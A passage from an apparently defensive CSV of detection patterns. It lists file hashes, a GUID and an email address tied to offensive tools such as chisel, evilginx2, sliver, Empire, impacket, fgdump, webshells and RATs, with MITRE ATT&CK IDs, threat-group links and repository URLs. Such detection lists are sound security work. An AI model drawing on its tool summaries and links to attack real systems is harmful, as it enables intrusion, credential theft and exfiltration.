TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22184" "*143ec041216db8df445e02dbb3a71e1603ab495879f073f63857474e32d239b4*",".{0,1000}143ec041216db8df445e02dbb3a71e1603ab495879f073f63857474e32d239b4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22186" "*14442756c9e9124e5f854b6c24d1176ee2f393732fc52a9df45486aef98abbc5*",".{0,1000}14442756c9e9124e5f854b6c24d1176ee2f393732fc52a9df45486aef98abbc5.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - 
TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","22187" "*1446b2b7ac055dd73177e7610141376dcdb8419b0422f81d69c589ce60e83e42*",".{0,1000}1446b2b7ac055dd73177e7610141376dcdb8419b0422f81d69c589ce60e83e42.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","22188" "*144ee3c2d9af200cbe10a4d0f9f78ff8fc5318ff75927e0da17b0679b002b071*",".{0,1000}144ee3c2d9af200cbe10a4d0f9f78ff8fc5318ff75927e0da17b0679b002b071.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","22189" "*14551c1d7c781b632e6722cfde0abb62c0698a657bf621ebe6e931a197e81715*",".{0,1000}14551c1d7c781b632e6722cfde0abb62c0698a657bf621ebe6e931a197e81715.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22190" "*1460d78f92f67929b451732af1d24752026b9d91fd85faec196460f7d4cac9f9*",".{0,1000}1460d78f92f67929b451732af1d24752026b9d91fd85faec196460f7d4cac9f9.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","22193" "*146371bea2dc7c088fd3e7b14e3156b838db646cd818ee5b95d7d792d31834eb*",".{0,1000}146371bea2dc7c088fd3e7b14e3156b838db646cd818ee5b95d7d792d31834eb.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22194" "*1464a0e12ee6eacddcc2bc879ad601918412b0d64f3cdceb04c216d6a5485052*",".{0,1000}1464a0e12ee6eacddcc2bc879ad601918412b0d64f3cdceb04c216d6a5485052.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - 
Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22195" "*146c1dbd6fc6758d9adbda9490b8272de6aeec711bafd925ad4057c3a2c317c1*",".{0,1000}146c1dbd6fc6758d9adbda9490b8272de6aeec711bafd925ad4057c3a2c317c1.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22197" "*146ca286f362290e96eda2a0b7cd9feb4e971763ba194731d1826e12e593439d*",".{0,1000}146ca286f362290e96eda2a0b7cd9feb4e971763ba194731d1826e12e593439d.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#filehash","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","22198" "*14770541b6a28f6c51b79793e8f7b16baef3127edd89a58eeaac723af7706a1c*",".{0,1000}14770541b6a28f6c51b79793e8f7b16baef3127edd89a58eeaac723af7706a1c.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","22200" "*1479fd64414f539188555cdf30c408fc9c42949d2b98fd55662b1b3ae93894e0*",".{0,1000}1479fd64414f539188555cdf30c408fc9c42949d2b98fd55662b1b3ae93894e0.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate 
assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","22201" "*1487de57ec8a5a8201abe0b868c17ff8cf04bed18a298050edb663a793c0e030*",".{0,1000}1487de57ec8a5a8201abe0b868c17ff8cf04bed18a298050edb663a793c0e030.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22203" "*148a719060fcc5ed37c33027cd39e320ca7fdd113500d5ea63128b8c506d86bc*",".{0,1000}148a719060fcc5ed37c33027cd39e320ca7fdd113500d5ea63128b8c506d86bc.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","22205" "*148b284dead436f9dbbc23f7e4861901ddc7f1d2cc03c49b8b0379ff6b5633b4*",".{0,1000}148b284dead436f9dbbc23f7e4861901ddc7f1d2cc03c49b8b0379ff6b5633b4.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","22206" 
"*149c0f553685f985a2eb714d9dcc54541423e57b4aecea5f2bdb747dfb9cc06d*",".{0,1000}149c0f553685f985a2eb714d9dcc54541423e57b4aecea5f2bdb747dfb9cc06d.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","0","#filehash","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","22207" "*14a0ceba63b3d76d7d30653112a0b43e3a2ef1f07a8030d7a949696b5c3065f6*",".{0,1000}14a0ceba63b3d76d7d30653112a0b43e3a2ef1f07a8030d7a949696b5c3065f6.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","22209" "*14a0f72e21730cd71eb2c9cf9a22682ac386aac36cca6a270ef01d9c1bd4561e*",".{0,1000}14a0f72e21730cd71eb2c9cf9a22682ac386aac36cca6a270ef01d9c1bd4561e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22210" "*14a2502eebb62133aad519e2717558388f459a4fe281566fbeb0251b0ab2611b*",".{0,1000}14a2502eebb62133aad519e2717558388f459a4fe281566fbeb0251b0ab2611b.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with 
network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","22211" "*14ba976d3427c5982fb1348b6d9212646e63e7531311fb362496f801f312594c*",".{0,1000}14ba976d3427c5982fb1348b6d9212646e63e7531311fb362496f801f312594c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22215" "*14CA405B-8BAC-48AB-9FBA-8FB5DF88FD0D*",".{0,1000}14CA405B\-8BAC\-48AB\-9FBA\-8FB5DF88FD0D.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22219" 
"*14cacb095c7f6d3347fe36b6576fde73047897330bae662fc29ef9f8169e0136*",".{0,1000}14cacb095c7f6d3347fe36b6576fde73047897330bae662fc29ef9f8169e0136.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#filehash","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","22221" "*14cb65175994e6e27ef631df1e99744308197f80c84d86ea457dd98a1d89f608*",".{0,1000}14cb65175994e6e27ef631df1e99744308197f80c84d86ea457dd98a1d89f608.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22223" "*14d0b48fef0484e290504ebd35fcca973fde787ef3db70b70de8b3070b287d46*",".{0,1000}14d0b48fef0484e290504ebd35fcca973fde787ef3db70b70de8b3070b287d46.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22224" "*14d65cb6ca5442b1c30f51ea73199b7bf32db17f5bb6c483346c13e0014545b0*",".{0,1000}14d65cb6ca5442b1c30f51ea73199b7bf32db17f5bb6c483346c13e0014545b0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22227" "*14d97dd35d6f42a44d6fa39a0fac3349848e9297f7c43cacc3bc4c2b045a4467*",".{0,1000}14d97dd35d6f42a44d6fa39a0fac3349848e9297f7c43cacc3bc4c2b045a4467.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22228" "*14e2f70470396a18c27debb419a4f4063c2ad5b6976f429d47f55e31066a5e6a*",".{0,1000}14e2f70470396a18c27debb419a4f4063c2ad5b6976f429d47f55e31066a5e6a.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - 
T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","#filehash","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","22230" "*14e8721290b9457ec4c641c48aaa111df18eeed8e1c208da18666d3f3dd8e2ff*",".{0,1000}14e8721290b9457ec4c641c48aaa111df18eeed8e1c208da18666d3f3dd8e2ff.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","#filehash","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","22232" "*14ed05af8630a01f953eee94967bf1e6a322819bf404b451038f8aacbde5569b*",".{0,1000}14ed05af8630a01f953eee94967bf1e6a322819bf404b451038f8aacbde5569b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22234" "*14f4e4311f119b7de45d53d0e48d8fe27afdfc1026bab7259ea6191c92c6faa0*",".{0,1000}14f4e4311f119b7de45d53d0e48d8fe27afdfc1026bab7259ea6191c92c6faa0.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation 
Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","22236" "*15010050@tutamail.com*",".{0,1000}15010050\@tutamail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","22238" "*1502b9bb17fe2a278c56ecfc1f3eb0cde62b083a260eda1ffe2423797962807d*",".{0,1000}1502b9bb17fe2a278c56ecfc1f3eb0cde62b083a260eda1ffe2423797962807d.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","#filehash","N/A","4","2","105","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z","22239" "*15065a09f2a944aa4376a3efe035b209f2c9617be19e08640320fb874e0e991c*",".{0,1000}15065a09f2a944aa4376a3efe035b209f2c9617be19e08640320fb874e0e991c.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - 
T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","22240" "*15079a1ec5eff9da11edafb3c59984d2ab9ce7b02fabfd07cc398ee31e7e1dc8*",".{0,1000}15079a1ec5eff9da11edafb3c59984d2ab9ce7b02fabfd07cc398ee31e7e1dc8.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","22241" "*1515c3b59422ffaaa8ca8eea53ae86a27a2c107972aa84e6b9cca68c7c9d53a1*",".{0,1000}1515c3b59422ffaaa8ca8eea53ae86a27a2c107972aa84e6b9cca68c7c9d53a1.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","22243" "*1526febbe627085a24dd59eefa206fddd88326d78beb00b6630989cc13526733*",".{0,1000}1526febbe627085a24dd59eefa206fddd88326d78beb00b6630989cc13526733.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - 
TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","#filehash","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","22247" "*1527fd3f217431af5c9c015db53aa229bb015d01babfd5fc83976ceb1f84a186*",".{0,1000}1527fd3f217431af5c9c015db53aa229bb015d01babfd5fc83976ceb1f84a186.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22248" "*15292172a83f2e7f07114693ab92753ed32311dfba7d54fe36cc7229136874d9*",".{0,1000}15292172a83f2e7f07114693ab92753ed32311dfba7d54fe36cc7229136874d9.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","#filehash","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","22250" "*154108656a02f90337dab0afac5056524caaf8bb08534f7c64c55f1fb2dbbc7a*",".{0,1000}154108656a02f90337dab0afac5056524caaf8bb08534f7c64c55f1fb2dbbc7a.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22251" "*155ae1264e89d69b716194c767d7b05e48588c30559be534b056a6a837ab998b*",".{0,1000}155ae1264e89d69b716194c767d7b05e48588c30559be534b056a6a837ab998b.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","22254" "*155c711cf850d024e86f65be8ff0f9e7e0e947c5632350913dadf8cc678909fa*",".{0,1000}155c711cf850d024e86f65be8ff0f9e7e0e947c5632350913dadf8cc678909fa.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","22255" "*1563ac6f8ae849b7ab2da0a5a154f29449cfd13917b9a13bc6ebab004445075d*",".{0,1000}1563ac6f8ae849b7ab2da0a5a154f29449cfd13917b9a13bc6ebab004445075d.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","22256" "*1565f9e89e6675525375dcb0e69cf08ef9a77a3d5bba36f89266a2c098dc6bda*",".{0,1000}1565f9e89e6675525375dcb0e69cf08ef9a77a3d5bba36f89266a2c098dc6bda.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","22257" "*156a20924b696b89e6df463edce6afe72bc8348af0c52c399ff5d88e3a9d6e5a*",".{0,1000}156a20924b696b89e6df463edce6afe72bc8348af0c52c399ff5d88e3a9d6e5a.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","0","#filehash","N/A","7","2","186","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z","22258" "*156e71ab72393301c2a27995c869afd9972b5fcf4f3a7e92e8335358f11e0306*",".{0,1000}156e71ab72393301c2a27995c869afd9972b5fcf4f3a7e92e8335358f11e0306.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts 
suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22259" "*15835E15B02D775A71F29ECEF61FC3E5ADB50C13F8987072A945AF99A17C0F6E*",".{0,1000}15835E15B02D775A71F29ECEF61FC3E5ADB50C13F8987072A945AF99A17C0F6E.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","22263" 